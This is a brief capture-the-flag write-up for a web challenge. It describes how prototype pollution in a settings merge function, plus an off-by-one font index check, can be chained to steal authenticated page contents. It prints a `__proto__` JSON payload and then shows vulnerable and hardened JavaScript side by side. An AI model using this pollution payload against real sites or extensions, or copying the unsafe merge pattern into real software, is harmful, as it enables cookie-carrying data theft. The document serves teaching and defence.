Charlotte's Web Solution
- Prototype pollution in `utils.merge()` and an off-by-one error let us pollute `utils.FONTS[10]` through `page-settings`.
- In the actual CTF challenge, the secret page is authenticated. Pollute `credentials: include` through `page-style` to include the necessary cookies.
Visit this page with the extension installed to view the exfiltrated contents.
Exfiltrated Contents
{
  "fontSize": "100%",
  "font": "https://xss-playground-challenges.vercel.app/charlotte/",
  "__proto__": {
    "10": "https://xss-playground-challenges.vercel.app/charlotte/"
  }
}
{}
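A minimal reproduction of the bug class described above, next to a hardened merge and bounds check. This is an added illustration, not the challenge's code: `mergeUnsafe`, `mergeSafe`, `pickFontUnsafe`, `pickFontSafe`, the `FONTS` contents and the `example.invalid` URL are assumptions modelled on the `__proto__` JSON shown on this page.

```javascript
// Hypothetical stand-ins for utils.merge() and utils.FONTS; not the challenge source.
// Constructed input shaped like the JSON on this page (placeholder URL).
const SETTINGS = '{"fontSize":"100%","__proto__":{"10":"https://example.invalid/x"}}';
const FONTS = Array.from({ length: 10 }, (_, i) => `font-${i}`); // valid indices 0..9

// Vulnerable pattern: follows every key, so "__proto__" resolves to Object.prototype.
function mergeUnsafe(target, source) {
  for (const key of Object.keys(source)) {
    const val = source[key];
    if (val !== null && typeof val === 'object') {
      if (typeof target[key] !== 'object' || target[key] === null) target[key] = {};
      mergeUnsafe(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Hardened: skip prototype-reaching keys and only recurse into own properties.
const BLOCKED = new Set(['__proto__', 'constructor', 'prototype']);
function mergeSafe(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED.has(key)) continue;
    const val = source[key];
    if (val !== null && typeof val === 'object' && !Array.isArray(val)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || typeof target[key] !== 'object' || target[key] === null) target[key] = {};
      mergeSafe(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Off-by-one: "<=" admits index 10, which is not an own element of FONTS.
const pickFontUnsafe = (i) => (i >= 0 && i <= FONTS.length ? FONTS[i] : FONTS[0]);
const pickFontSafe = (i) => (Number.isInteger(i) && i >= 0 && i < FONTS.length ? FONTS[i] : FONTS[0]);

function demo() {
  const out = {};
  mergeSafe({}, JSON.parse(SETTINGS));
  out.afterSafe = pickFontUnsafe(10);   // nothing inherited: prototype untouched
  mergeUnsafe({}, JSON.parse(SETTINGS));
  out.afterUnsafe = pickFontUnsafe(10); // value inherited from Object.prototype["10"]
  out.boundsFixed = pickFontSafe(10);   // strict bound falls back to FONTS[0]
  delete Object.prototype['10'];        // undo the pollution
  return out;
}
console.log(demo());
```

Either fix alone breaks the chain: the filtered merge keeps `Object.prototype` clean, and the strict `<` bound never reads an index that the array does not own.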